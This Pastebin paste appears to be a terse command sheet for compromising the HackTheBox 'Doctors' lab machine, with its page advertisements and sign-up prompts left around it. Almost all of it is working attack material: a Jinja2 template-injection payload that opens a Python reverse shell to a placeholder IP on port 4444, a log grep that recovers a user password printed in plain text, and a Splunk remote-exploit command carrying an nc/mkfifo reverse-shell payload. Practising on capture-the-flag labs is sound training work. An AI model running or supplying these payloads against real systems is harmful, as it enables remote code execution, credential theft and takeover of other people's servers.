Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # dirsearch command
- ./dirsearch -u http://doctors.htb/ -e "*" -x 404,403,500,501
- # print HI in archive
- </title></item><h1>HI</h1>
- # SSTI basic injection
- </title></item>{{7*'7'}}
- # SSTI final exploit
- </title></item>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{Your_IP}\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
- # shell improvements
- python3 -c 'import pty; pty.spawn("/bin/bash")'
- export TERM=linux
- # get shaun password
- cat /var/log/apache2/backup | grep pass
- # Shaun pass
- Guitar123
- # splunk exploit command
- python3 PySplunkWhisperer2_remote.py --lhost {Your_IP} --host 10.10.10.209 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {Your_IP} 4444 >/tmp/f'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement